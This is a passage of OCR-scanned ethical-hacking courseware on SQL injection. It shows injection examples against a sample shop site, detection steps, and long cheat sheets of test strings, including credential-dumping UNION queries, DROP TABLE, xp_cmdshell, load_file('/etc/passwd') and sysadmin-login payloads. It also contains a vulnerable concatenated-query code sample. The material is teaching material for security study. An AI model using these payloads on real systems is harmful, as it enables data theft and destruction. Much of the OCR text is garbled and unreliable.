UNION SELECT id , name,
0 FROM s y s o b je c ts WHERE xtype = 'U ' --
The UNION statement in particular is useful to a hacker because it allows him or her to splice
the results of one query onto another. In this case, the hacker has spliced the names of the user
tables in the database to the original query of the Products table. The only trick is to match the
number and data types of the columns to the original query. The previous query might reveal
Module 14 Page 2010
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
26. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
that a table named Users exists in the database. A second query could reveal the columns in the
Users table. Using this information, the hacker might enter the following into the txtFilter
textbox:
UNION SELECT 0, UserName, Password, 0 FROM U sers -Entering this query reveals the user names and passwords found in the Users table.
p r i v a t e v o id c m d r i lt e r _ c l ic k ( 0b j e c t s e n d e r, S y ste a .E v e n tA rg s e)
d g rP ro d u c ts . C u rren tP ag eIn d ex = 0;
b in d O a t a O r id () ; )
{
p r iv a t e v o id b in d O a ta O rid () (
d g rP ro d u c ts . D ataSource = c r e a te D a ta V ie w ();
d g rP ro d u c ts . D a ta B in d ( ) ; )
p r i v a t e D ataV iew c re a te D a ta V ie w ()
(
s t r in g strC n x =
" s e r v e r =lo c a lh o s t ;u id = s a , pwd= datab a se=n o rth w ln d '־
־
s t r in g strSQL = "SELECT ProductXd, ProductN ane, ■ H
" Q u a n tlty P e r U n lt, U n itP r ic e FROM P r o d u c t s ':
FIGURE 14.5: BadProductList.aspx
Module 14 Page 2011
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
27. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Exam ple 2: Attack A nalysis
CEH
Urt«fW<
ItlMui HMkM
SELECT Productld, ProductName, QuantityPerUnit, UnitPrice FRO Products W
M
HERE
ProductName LIKE 'blah' UNION Select 0, username, password, 0 from users —
Copyright © b y
EG-C0uacil. All
Rights R eserved. Reproduction is Strictly Prohibited.
E x a m p l e 2: A t t a c k A n a l y s i s
Any website has a search bar for the users to search for data and if the search bar
can't find the vulnerabilities in the data entered, then it can be used by attackers to create
vulnerabilities to attack.
W hen you enter the value into the search box as: blah UNION Select 0, username, password, 0
from users.
SQL Query Executed:
SELECT ProductID,
ProductName
LIKE
ProductName, QuantityPerUnit, UnitPrice
'blah' UNION SELECT
0,
FROM Products
username, password,
0 FROM
USERS
WHERE
--
After executing the SQL query it shows results with the user names and passwords.
Module 14 Page 2012
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
28. Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
SQL Injection
O
O
http://|uggyboyshop com
Ju g g y B o y S h o p .c o m
Search for Products
c
נ
>
Attacker Launching
SQL Injection
J
blah' UNION Select 0, username,
password 0 from users —
Usernam es and Passwords are displayed
FIGURE 14.6: Attack Analysis
Module 14 Page 2013
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
29. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Example 3: Updating Table
E x a m p l e 3: U p d a t i n g T a b l e
To create the UPDATE command in the SQL query the syntax is:
UPDATE " table_nam e"
SET "co lu m n _l" = [new v a lu e ]
WHERE {c o n d itio n }
For example, say we currently have a table as follows:
Table Store Information
Store_Nam e
Sales
Date
Sydney
$100
Aug-06-2012
Melbourne
$200
Aug-07-2012
Queensland
$400
AUg-08-2012
Victoria
$800
Aug-09-2012
TABLE 14.1: Store Table
And we notice that the sales for Sydney on 08/06/2012 are actually $250 instead of $100, and
that particular entry needs to be updated. To do so, we use the following SQL query:
Module 14 Page 2014
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
30. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
UPDATE Store Information
SET S a le s = 250
WHERE s to re name = "Sydney"
AND Date = "08/06/2012"
The resulting table would look like this:
Table Store Information
Store_Nam e
Sales
Date
Sydney
$250
Aug-06-2012
Melbourne
$200
Aug-07-2012
Queensland
$400
AUg-08-2012
Victoria
$800
Aug-09-2012
TABLE 14.2: Store Table After Updating
Ju g g y B o y .c o m
Forgot Password
Attacker Launching SQL Injection
blah'; UPDATE jb-customers SET jb-email
- 'info8juggyboy.com' WHERE email
='jason5springfield.com; --
E m a il A d d r e s s
Your passw ord will be sent to your
registered email address
Ml
SQL Injection Vulnerable W ebsite
SQL Query Executed
SEI.F.CT j b - e m a 1 l , j b - p a s s w d , j b - 1 o g i n _ i r i , j b - l a s t _ n a m e F R O M m e m b e r s
WHERE ־
jb-email - ,blah'; UPDATE jb-customers SET jb-email - 'info@juggyboy.com'
w h e r e email = ’jasonpspringfield.com; — ■;
FIGURE 14.7: SQL Injection Attack
Module 14 Page 2015
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
31. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Example 4: Adding New Records
CEH
u
J
f
1 1
g g y B o y . c o m
t
Fo rg o t P a s s w o rd
Attacker Launching SQL Injection
b la h ’ ;
IN S E R T
IN T O
jb - c u s t o m e r s
Em ail Address
p a s s w d ' , 1j b ־l o g i n _ i d ' , ' j b ־־l a s t _ n a m e ' )
( ' ja s o n @ s p r in g f ie ld . com ' , ' h e l l o ',
Your passw ord will be sent to your
registered em ail address
( ' jb ־e m a il ' , יjb ־
VA LU ES
' j a s o n ' , ' ja s o n
YL
s p r in g f ie ld ') ; —
SQL Injection Vulnerable Website
S Q L Q u e ry E x e c u t e d
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members
WHERE email = 'blah1; INSERT INTO jb-customers (יj b - e m a i l j b - p a s s w d 1 j b - l o g i n _ i d יjblast name') VALUES ('j a s o n @ s p r i n g f i e l d .c o m יh e l l o j a s o n ', 'jason S p r i n g f i e l d 1); — ;י
Copyright © b y EG-GlOOCil. All Rights Reserved. Reproduction Is Strictly Prohibited.
E x a m p l e 4: A d d i n g N e w R e c o r d s
The following example illustrates the process of adding new records to the table:
INSERT INTO ta b le name (colum nl, column2, column3. . . )
VALUES ( v a l u e l , v a lu e 2 , v a lu e 3 . . . )
Sto re_N am e
Sales
Date
Sydney
$250
Aug-06-2012
M elbourne
$200
Aug-07-2012
Queensland
$400
AUg-08-2012
Victoria
$800
Aug-09-2012
TABLE 14.3: Store Table
INSERT INTO table_nam e
VALUES ("A d e la id e ",
Module 14 Page 2016
(" s t o r e name", " s a l e s " , "d a t e ")
"$1000","08/10/2012")
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
32. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
S to re N am e
Sales
D ate
Sydney
$250
Aug-06-2012
Melbourne
$200
Aug-07-2012
Queensland
$400
AUg-08-2012
Victoria
$800
Aug-09-2012
Adelaide
$1000
Aug-10-2012
TABLE 14.4: Store Table After Adding New Table
http://1UHRVboy.com
H
■ 1g g y R 0 y.com
!'
Fo rg o t P a s s w o r d
Email Address
Attacker Launching SQL Injection
Your passw ord w ill be sent to your
registered email address
3
b l a h ' ; INSERT INTO jb - c u s to m e r s ( ' j b - e n a i l ' , יb p a s s w d , יj b ־l o g i n _ i d ' , 1j b ־Ia s t_ n a !B © ' ) VA 1XJES
יa s o n s p r i n g f l e l d . c o r e 1 , , h o l l o ' , יja s o n ^ י , יa so n
s p r in g fie ld ’ ) ; —
(3
1
0
SQL Injection Vulnerable Website
V
SQL Query Executed
SELEC T
W H ERE
jb - e m a ilf
e m a il
la s t n a m e ')
=
jb - p a s s w d ,
'b l a h ';
VA LU ES
jb - lo g in _ id ,
IN S E R T
IN T O
jb - la s t_ n a m e
jb - c u s t o m e r s
FRO M m e m b e rs
( ' j b - e m a i l j b - p a s s w d j b - l o g i n i d j b -
( ' ja s o n @ s p r in g f 1 e ld .c o m ' , * h e l l o ’
ja s o n ' ,
ja s o n
s p n n g f i e l d ') ; — *;
FIGURE 14.8: SQL Injection Attack
Module 14 Page 2017
Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil
All Rights Reserved. Reproduction is Strictly Prohibited.
33. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Example 5: Identifying the Table
Name
C EH
BBQ
J
1 1
g g y B o y . c o m
Forgot Password
■
Em ail Address
Your passw ord will be sent to your
registered em ail address
blah’ AND 1=(SELECT COUNT(*) FROM
mytable); -SQL Injection Vulnerable Website
You will need to guess table names here
S Q L Q u e ry E x e c u t e d
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FR M table W ERE ;jb-email =
O
H
,blah' A D 1=(SELECT COUNT(*) FR M mytable); —■
N
O
;
Copyright © b y
f ij
EG-G*ancil. All
Rights Reserved. Reproduction is Strictly Prohibited.
E x a m p l e 5: I d e n t i f y i n g t h e T a b l e N a m e
e so
|
Ju g g y B o y .c o m
Fo rg o t P a s s w o rd
Attacker Launching SQL Injection
I
Email Address
blah' A D 1=(SELECT COUNT(*) FR M
N
O
mytable); —
Your password will be sent to your
registered email address
A
You w ill n eed to guess tab le n a m es h ere
SQL Injection Vulnerable Website
S Q L Q u e ry E x e c u te d
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email =
'blah' AND !( ־SELECT COUNT(*) FROM m y t a b l e ) ; —
FIGURE 14.9: Identifying the Table Name
Module 14 Page 2018
Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil
All Rights Reserved. Reproduction is Strictly Prohibited.
34. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Exam ple 6: D eleting a Table
J
1 1
g g y B o y . c o m
Fo rg o t P a s s w o rd
Attacker Launching SQL Injection
Em ail Address
Your passw ord will be sent to your
registered em ail address
blah'; DROP TABLE Creditcard; --
J
SQL Injection Vulnerable Website
S Q L Q u e ry E x e c u t e d
SELECT jb-email, jb-passwd, jb-login_id, jk־last_name FROM members
WHERE jb-email = ,blah'; DROP TABLE Creditcard; — ';
Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
* E x a m p l e 6: D e l e t i n g a T a b l e
Attacker Launching SQL I j c i n
neto
blah'; DROP TABLE Creditcard; —
SQL I j c i n Vulnerable Website
neto
S Q L Q u e ry E x e c u te d
SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FRO m bers
M em
W
HERE jb-email = ,blah'; DRO TABLE Creditcard; — ; י
P
FIGURE 14.10: Deleting Table
Module 14 Page 2019
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
35. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
M o d u le F lo w
C EH
(•rtifwtf
ttkujl IUU1
Copyright © by EG-GtODCil. All Rights R eserved. Reproduction is Strictly Prohibited.
0
-
0 ־
M o d u le F lo w
So far, we have discussed various concepts of SQL injection. Now we will discuss how to
test for SQL injection. SQL injection attacks are attacks on web applications that rely on the
databases as their background to handle and produce data. Here attackers modify the web
application and try to inject their own SQL commands into those issued by the d a tab a se .!
SQL Injection Concepts
^*
Advanced SQL Injection
Testing for SQL Injection
SQL Injection Tools
Types of SQL Injection
^
Blind SQL Injection
^
v— ׳
)
Evasion Techniques
Countermeasures
SQL Injection Methodology
Module 14 Page 2020
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
36. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
This section focuses on SQL injection attack characteristics and their detection.
Module 14 Page 2021
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
37. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
S T E P 1: Check if the web
S T E P 6: Detailed error messages
provide a wealth of information to
an attacker in order to execute
SQL injection
application connects to a
Database Server in order to
access some data
S T E P 2: List all input fields,
S T E P 5: The UNION
hidden fields, and post
operator is used to
requests whose values
could be used in crafting a
combine the result-set of
tw o or more SELECT
SQL query
statements
S T E P 4: Try to insert a string
S T E P 3: Attempt to inject
value where a number is
codes into the input fields to
expected in the input field
generate an error
Copyright © by EC-CMICil. All Rights Jte$'ervfei;Reproduction is Strictly Prohibited.
^
SQL Injection Detection
The following are the various steps to be followed to identify SQL injections.
Step 1: Check if the web application connects to a Database Server in order to access some
data.
Step 2: List all input fields, hidden fields, and post requests whose values could be used in
crafting a SQL query.
Step 3: Attempt to inject codes into the input fields to generate an error.
Step 4: Try to insert a string value where a number is expected in the input field.
Step 5: The UNION operator is used in SQL injections to join a query to the original query.
Step 6: Detailed error messages provide a wealth of information to an attacker in order to
execute SQL injection.
Module 14 Page 2022
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
38. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL In jectio n Error M e s s a g e s
Attempt to inject codes into the
input fields to generate an error
a single quote ('), a semicolon
(;), comments ( ,)־־AND, and OR
[51
CEH
Microsoft OLE DB Provider for ODBC Drivers
error '80040el4'
[Microsoft][ODBC SQL Server Driver][SQL
Server]Unclosed quotation mark before the
character string .יי
/shopping/buy.
aspx, line 52
4C4
1■
U
Attacker
Try to insert a string v a lu e
w h e r e a n u m b e r is expected
in th e in p u t field
Microsoft OLE DB Provider for ODBC Drivers
error '80040607' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error
converting the varchar value 'test' to a
column of data type int. /visa/credit.aspx,
line 17
N ote: If applications do n ot provide detailed e rro r messages and re tu rn a sim ple '500 Server E rror1or a custom e rro r page
th e n a tte m p t b lin d in je ctio n techniques
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection Error Messages
The attacker makes use of the database-level error messages disclosed by an
application. This is very useful to build a vulnerability exploit request. There are even chances of
automated exploits based on the different error messages generated by the database server.
These are the examples for the SQL injection attacks based on error messages:
Attempt to inject codes into the input fields to generate an error a single quote ('), a semicolon
(;), comments (-), AND, and OR.
Microsoft OLE DB Provider for ODBC Drivers error '80040el4'
[M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L
b e fo re the c h a r a c te r s t r in g ' ' .
S e rv e r]U n c lo s e d q u o ta tio n mark
/shopping/buy. aspx , l i n e 52
Try to insert a string value where a number is expected in the input field:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[M icro so ft][O D B C SQL S e r v e r D r iv e r ][S Q L S e r v e r ] Syntax e r r o r c o n v e rtin g the
v a rc h a r v a lu e ' t e s t ' to a column o f d ata type i n t . / v i s a / c r e d i t . aspx, l i n e 17
Note: If applications do not provide detailed error messages and return a simple '500 Server
Error' or a custom error page, then attempt blind injection techniques.
Module 14 Page 2023
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
39. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL Injection Attack Characters
CEH
Urtiftetf
' or יCharacter string indicators
י
—
?Paraml=foo&Param2=bar
/*./*״
+
Addition, concatenate (or space in url)
11
(Double pipe) concatenate
%
Wildcard attribute indicator
Useful as nontransactional command
© variable
Multiple-line comment
URL Parameters
PRINT
or # Single-line comment
Local variable
(*®variable
Global variable
w a itfo r d elay
•0 :0 :1 0 ׳
ttkujl lUckM
Time delay
Displays SQL server
version
V ©Aversion
Copyright © by EG-GtOIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection Attack Characters
The following is a list of characters used by the attacker for SQL injection attacks:
Character
Function
, o r"
Character string indicators
- or #
-
Single-line comment
J*
*j
Multiple-line comment
+
Addition, concatenate (or space in url)
II
(Double pipe) concatenate
%
Wildcard attribute indicator
?Paraml=f00&Param2=bar
URL Parameters
PRINT
Useful as non-transactional command
(®variable
Local variable
(®(®variable
Global variable
waitfor delay '0:0:10'
Time delay
(®(®version
Displays SQL server version
Module 14 Page 2024
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
40. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Additional M ethods to D etect
SQL Injection
Ex am p le of
Functio n Testing
F u n c tio n T e s tin g
M ethod 1
►
CEH
This testing falls within the scope of black
s
»
M e th o d 3
inputting massive amount of random data
and observing the changes in the output
http:://juggyboy/?param eter=l AND 1=1http:://juggyboy/?param eter=l'-
a
http:://juggyboy/?param eter=l AND 1=2--
0
http:://juggyboy/?param eter=l'/*
0
http:://juggyboy/?param eter=l' AND T = ' l
»
V
http:://juggyboy/?param eter=l"
&
It is an adaptive SQL injection testing
technique used to discover coding errors by
http:://juggyboy/?param eter=l'#
»
F u z z in g T e s tin g
M e th o d 2
http:://juggyboy/?param eter=l'
a
V
or logic
http:://juggyboy/?parameter=123
s
box testing, and as such, should require no
knowledge of the inner design of the code
http:://juggyboy/?param eter=l order by 1000
S ta tic / D y n a m ic T e s tin g
Analysis of the web application source
co11e
#
3
1
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
Additional Methods to Detect SQL Injection
SQL injection can be detected with the help of the following additional methods:
(&
F u n ctio n T estin g
This testing falls within the scope of black box testing, and as such, should require no
knowledge of the inner design of the code or logic.
F u zzin g T estin g
&
Fuzzy testing is a SQL injection testing technique used to discover coding errors by
inputting a massive amount of data to crash the web application.
S tatic /D y n am ic T estin g
Static/dynamic testing is the manual analysis of the web application source code.
Example of Function Testing:
9
http://juggyboy/?parameter=123
a
http://juggyboy/?parameter=r
Module 14 Page 2025
Ethical Hacking and Countermeasures Copyright © by EC-C0linCil
All Rights Reserved. Reproduction is Strictly Prohibited.
41. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
©
http://juggyboy/?parameter=r#
©
http://juggyboy/?parameter=r׳
©
http://juggyboy/?parameter=l AND 1=1—
©
http://juggyboy/?parameter=r־
©
http://juggyboy/?parameter=l AND 1=2--
©
http://juggyboy/?parameter=l'/*
©
http://juggyboy/?parameter=l' AND T = 'l
©
http://juggyboy/?parameter=l order by 1000
Module
14 Page 2026
Ethical Hacking and Countermeasures Copyright © by EC-C0linCil
All Rights Reserved. Reproduction is Strictly Prohibited.
42. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
SQL Injection Black Box Pen
Testing
Detecting SQL Injection Issues
J
J
Send single quotes as the input data to
catch instances where the user input is
not sanitized
Send double quotes as the input data to
catch instances where the user input is
not sanitized
CEH
Detecting Input Sanitization
Use right square bracket (the ]
<W>
character) as the input data to catch
instances where the user input is used
as part of a SQL identifier without any
input sanitization
lL J-.
Detecting SQL Modification
Detecting Truncation Issues
Send long strings of single quote characters
(or right square brackets or double quotes)
Send long strings of junk data, just as
you would send strings to detect buffer
These max out the return values from
REPLACE and QUOTENAME functions and
might truncate the command variable used
to hold the SQL statement
overruns; this action might throw SQL
errors on the page
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
SQL Injection Black Box Pen Testing
In black box testing, the pen tester doesn't need to possess any knowledge about the
network or the system to be tested. The first job of the tester is to find out the location and
system infrastructure. The tester tries to identify the vulnerabilities of web applications from
the attacker's perspective. Use special characters, white space, SQL keywords, oversized
requests, etc. to determine the various conditions of the web application. The following are the
various issues related to SQL injection black box penetration testing:
Detecting SQL Injection Issues
Send single quotes as the input data to catch instances where the user input is not sanitized.
Send double quotes as the input data to catch instances where the user is not sanitized.
Detecting Input Sanitization
Use the right square bracket (the ] character) as the input data to catch instances where the
user input is used as part of a SQL identifier without any input sanitization.
Detecting SQL Modification
Send long strings of single quote characters (or right square brackets or double quotes). These
max out the return values from REPLACE and QUOTENAME functions and might truncate the
command variable used to hold the SQL statement.
Module 14 Page 2027
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
43. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Detecting Truncation Issues
Send long strings of junk data, just as you would send strings to detect buffer overruns; this
action might throw SQL errors on the page.
Module 14 Page 2028
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
44. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Testing for SQL Injection
|
Testing String
1
Variations
Single code
1 ׳or T = ' l
value' or 'l'= 2 ״
1' and T = '2
1 1
1
Testing String
Variations
I
'; drop table
Testing String
CEH
UrtifM
IthKJl lUckM
Variations
admin'--
adm in1
)-
ad m in '#
admin')#
users-
l )־o r (,־־!־l
valu e') o r ('l'= '2
1+1
3-1
1') and ( T « 2 ״
1' or 'a b '= 'a V b
1') o r ('ab'=’a V b
1' or 'ab'='a' 'b
1') or('a b '= ’a " b
1' or 'ab'='a'| |'b
1-
1
1') or (’ab'='a'| |'b
1 or 1=1-
Variations
';(SQL Statement];--
יo r '1'='1'—
');[SQL Statement];#
;(SQL Statement];-
);[SQL Statement];-
;(SQL Statement];#
);[SQL Statement];#
’) or T « ' l ' -
value) or (1=2
');{SQL Statement];-
,;[SQL Statement];!)
1) o r 1=1-
1) o r (1=1
1 or 1=1
valu e or 1=2
Testing String
1( ־ ־
j
valu e + 0
1 and 1=2
1 or 'ab'= 'a V b '
1) and (1=2
1) or ('ab '= 'a V b '
1 or 'a b '= 'a "b '
1) or ('ab'■'•‘ T
>
l)o r fab'-'a'I !*b'
1 o r ' a b '^ a 'I |'b'
Testing String
Variations
-1 and 1=2-
-1) and 1=2-
’ and '1’='2—י
') a n d 'IV ? -
!/ *co m m e n t*/
Copyright © by EG-CtUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.
Testing for SQL Injection
Some of the testing strings with variations used in the database handling commonly
bypass the authentication mechanism. You can use this cheat sheet to test for SQL injection:
F IG U R E 14.11: Testing for SQ L Injection
Module 14 Page 2029
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
45. Ethical Hacking and Countermeasures
SQL Injection
Testing String
Exam 312-50 Certified Ethical Hacker
Testing String
Testing String
Testing String
116
or 1=1-
%22+or+isnull%281%2F0%29+%2F*
7**/OR/**/l/**/=
/**/l
11־
6
" or"a"="a
' group by userid having 1=1-
' or 1 in (select
(®(®version)-
(116)
Admin' OR '
EXECUTE IMMEDIATE ,SEL' 1 'ECT
1
US ־ER 1 '
1
' OR 1=1-
' having 1=1-
CRATE USER name IDENTIFIED BY
'passl23'
OR 1=1
' OR 'text' =N'text'
' OR 'l'= 'l
' OR 2 > 1
; OR T = T
' OR 'text' >'t'
%27+—
+
' union select
l,load_f1le('/etc/passwd'),l,l,l;
exec master..xp_cmdshell 'ping
10.10.1.2'-
' union all select
@@version״
' OR 'unusual' =
,unusual'
' OR 'something' =
,someVthing'
' OR 'something'
like 'some%'
'; EXEC ('SEL' +'ECT
US' +'ER')
+or+isnull%281%2F
0%29+%2F*
%27+OR+%277659
%27%3D%277659
%22+or+isnull%281
%2F0%29+%2F*
' and 1 in (select
var from temp)'; drop table temp
exec sp addsrvrolemember 'name',
'sysadmin'
' union select
Testing String
UNI/**/ON
SEL/**/ECT
' OR 'whatever' in
('whatever')
' OR 2 BETWEEN 1
and 3
' or username like
char(37);
" or 1=1-
Password:*/=l-
GRANT CONNECT TO name; GRANT
RESOURCE TO name;
'o r 1=1/*
' or 1/*
' union select * from users where login
=char(114,lll,lll,116);
exec sp_addlogin
'name', 'password'
@var select < va
S> r
as var into temp
end -
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
Testing for SQL Injection (Cont’d)
Additional testing strings used to test for SQL injection include:
Testing String
Testing String
116
Testing String
l/ •
•/
■ / * * / O R/* * / l / * * / '
UNI/* */ON
SEL// ״ECr
' group by userid having 1 * 1 -
" or "־־ ״a
V
o r 1 in (select '
EXEC (•SEl' ♦• T
EC
US-♦ ER)
version ^
@
(116)
* Admin' OR
־OR 1 1 -־
Testing String
%22+or+fsnuM%281%2F0%29+%2F*
or 1-1-
־ll6־
Testing String
having 1 = 1 1
;־EXECUTE IMMEDIATE SEL־ 11 ־ECT
US* 11 ER*
CRATE USER nam e IDENTIFIED BY
־p assl2 3 ־
OR 1 1 ־
, OR ,t e x t «־N.text־
'OR ' 1 1 י י
־
' OR 2 < 1
(״
' union all select
vcrsion > § > § ״
* = 'OR ,unusual
'unusual,
♦or+isnull%281%2F
0 % 2 9 .% 2 F *
%27+OR+%277659
%27%3D%277659
%22+or+isnull%281
' union select
l,load_fiIe{/etc/pdSS W d,) , l , l , l ;
exec m astei ״xp_andshell ,ping
10.10.1.2־
-
= 'OR ,som ething '
'OR ,som ething '
'%like 'some
;OR T - T
OR ,text 1 <,*
׳t
K27+-f
union select '
" or 1=1-
Password:*/ -־־l
GRANT CONNECT TO nam e; GRANT
RESOURCE TO name;
* OR 2 BETWEEN 1
and 3
' or 1-1 /*
or ' 1/*
־union select * fro m users w h e re login
- char( 114,111,111,116);
’ or username like
char ) 37 (;
exec sp_9<klsryrolemem ber ־n a m e ',
sysadmin'
%2 FO S2 9 + V 2 F*
'so jm e 't'th in g ,
' and 1 in (select
y^r fro m t e m p ) ‘ ; drop tah le te m p
OR ,w h a te ve r' in '
w h a te v e r1(
,
(
exec sp ..addlogin
,n a m e ', 'password'
<®var select ff» « r
as var in to te m p
end —
F IG U R E 14.12: A dditional Testing Strings
Module 14 Page 2030
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
46. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
M odule Flow
CEH
(•rtifwtf
ttkujl IU U 1
Copyright © by EG-GtODCil. All Rights Reserved. Reproduction is Strictly Prohibited.
M odule Flow
So far, we have discussed various SQL injection concepts and how to test web
applications for SQL injection. Now we will discuss various types of SQL injection. SQL injection
attacks are performed in many different ways by poisoning the SQL query, which is used to
access the database.
(
SQL Injection Concepts
^
Testing for SQL Injection
(C, *
Advanced SQL Injection
SQL Injection Tools
Types of SQL Injection
^ )
Evasion Techniques
Blind SQL Injection
^
Countermeasures
y
—
SQL Injection Methodology
Module 14 Page 2031
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
47. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
This section gives insight into the different ways to handle SQL injection attacks. Some simple
SQL injection attacks, including blind SQL injection attacks, are explained with the help of
examples.
Module 14 Page 2032
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
48. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Types of SQL Injection
9
CEH
U N IO N S Q L
In je c tio n
Types of SQL Injection
The following are the various types of SQL injection:
SQL In je c tio n
^
SQL injection is an attack in which malicious code is injected through a SQL query
which can read the sensitive data and even can modify (insert/update/delete) the data. SQL
injection is mainly classified into two types:
Blind SQL Injection
W here ever there is web application vulnerability, blind SQL injection can be used either to
access the sensitive data or to destroy the data. The attacker can steal the data by asking a
series of true or false questions through SQL statements.
Simple SQL Injection
A simple SQL injection script builds a SQL query by concatenating hard-coded strings together
with a string entered by the user. Simple SQL injection is again divided into two types:
9
UNION SQL Injection: UNION SQL injection is used when the user uses the UNION
command. The attacker checks for the vulnerability by adding a tick to the end of a
".php? id=" file.
Module 14 Page 2033
Ethical Hacking and Countermeasures Copyright © by EC-COUIICil
All Rights Reserved. Reproduction is Strictly Prohibited.
49. Ethical Hacking and Countermeasures
SQL Injection
9
Exam 312-50 Certified Ethical Hacker
Error Based SQL Injection: The attacker makes use of the database-level error messages
disclosed by an application. This is very useful to build a vulnerability exploit request.
Module 14 Page 2034
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction is Strictly Prohibited.
50. Ethical Hacking and Countermeasures
SQL Injection
Exam 312-50 Certified Ethical Hacker
Simple SQL Injection Attack
CEH
System Stored Procedure
Attackers exploit databases' stored
procedures to perpetrate their attacks
Union Query
"UNION SELECT" statement returns
;tatement
the union of the intended dataset
with the target dataset ■
1e target dataset
End of Line Comment
#
^
After injecting code into a
particular field, legitimate
W & )
I
V
^
code that follows is nullified
through usage of end of line
comments
SELECT Name, Phone, Address
FROM Users WHERE Id=l UNION
ERE
ALL SELECT
ker ,1,1
creditCardNumber,1,1 FROM
CreditCardTable
Tautology
/
f
L
1 JU J
g
j
SELECT * FROM u s e r WHERE name
'x' AND userid IS NULL; —
Injecting statements that are
always true so that queries always
return results upon evaluation of a
Kc o ...
W HERE condition
data types, names of tables, etc.
SELECT * FROM users WHERE name
= '' OR '1'
='1';
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Simple SQL Injection Attacks
A simple SQL injection script builds an SQL query by concatenating hard-coded strings
together with a string entered by the user. The following are the various elements associated
with simple SQL injection attacks:
9
System Stored Procedure: Attackers exploit databases' stored procedures to perpetrate
their attacks.
a
End of Line Comment: After injecting code into a particular field, legitimate code that
follows is nullified through the use of end of line comments.
SELECT * FROM u se r WHERE name = 'x ' AND u s e r id I S NULL; —
©
Illegal/Logically Incorrect Query:
An attacker may gain
knowledge
by injecting
